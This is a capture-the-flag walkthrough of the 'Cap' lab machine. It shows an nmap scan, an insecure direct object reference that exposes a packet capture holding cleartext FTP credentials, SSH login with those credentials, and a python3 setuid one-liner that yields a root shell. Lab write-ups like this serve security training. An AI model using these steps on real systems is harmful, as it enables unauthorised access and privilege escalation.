Cap

, ,

# Tools


## Getting User

### Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p21,22,80 10.129.73.189 
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 01:36 EST
Nmap scan report for 10.129.73.189
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.99 seconds

### Foothold
Going to http://10.129.73.189/, I see it’s a Security Dashboard.

Upon going through the website, I find a Security Snapshot page where it captures 5 seconds snapshot PCAP and it takes me to http://10.129.73.189/data/1.
Changing the url to http://10.129.73.189/data/0, I can download the first snapshot.
I find the following FTP credentials in 0.pcap file.

1
2
3
4
5
34	2.626895	192.168.196.16	192.168.196.1	FTP	76	Response: 220 (vsFTPd 3.0.3)
36	4.126500	192.168.196.1	192.168.196.16	FTP	69	Request: USER nathan
38	4.126630	192.168.196.16	192.168.196.1	FTP	90	Response: 331 Please specify the password.
40	5.424998	192.168.196.1	192.168.196.16	FTP	78	Request: PASS Buck3tH4TF0RM3!
42	5.432387	192.168.196.16	192.168.196.1	FTP	79	Response: 230 Login successful.

Username: nathan
Password: Buck3tH4TF0RM3!

Connecting to the server using the credentials I found, I got the user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali㉿kali)-[~]
└─$ ssh nathan@10.129.73.189                         
The authenticity of host '10.129.73.189 (10.129.73.189)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.73.189' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.73.189's password: 
Permission denied, please try again.
nathan@10.129.73.189's password: 
Permission denied, please try again.
nathan@10.129.73.189's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 15 07:38:43 UTC 2026

  System load:           0.08
  Usage of /:            36.8% of 8.73GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             227
  Users logged in:       0
  IPv4 address for eth0: 10.129.73.189
  IPv6 address for eth0: dead:beef::250:56ff:fe94:37b7

  => There are 4 zombie processes.


63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ ls
user.txt

## Getting Root

### Information Gathering

I found /var/www/html folder which contains the files the of web app.

1
2
nathan@cap:/var/www/html$ ls
__pycache__  app.py  static  templates  upload

After reviewing app.py, I see that capture function looks interesting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
@app.route("/capture")
@limiter.limit("10 per minute")
def capture():

        get_lock()
        pcapid = get_appid()
        increment_appid()
        release_lock()

        path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")
        ip = request.remote_addr
        # permissions issues with gunicorn and threads. hacky solution for now.
        #os.setuid(0)
        #command = f"timeout 5 tcpdump -w {path} -i any host {ip}"
        command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
        os.system(command)
        #os.setuid(1000)

        return redirect("/data/" + str(pcapid))

specially this part, which is using python to run the command as root.

1
command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""

### Privilege Escalation

Running the following command give us root

1
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now we can get this root flag.

1
2
3
nathan@cap:/var/www/html$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/var/www/html# cd /root
root@cap:/root#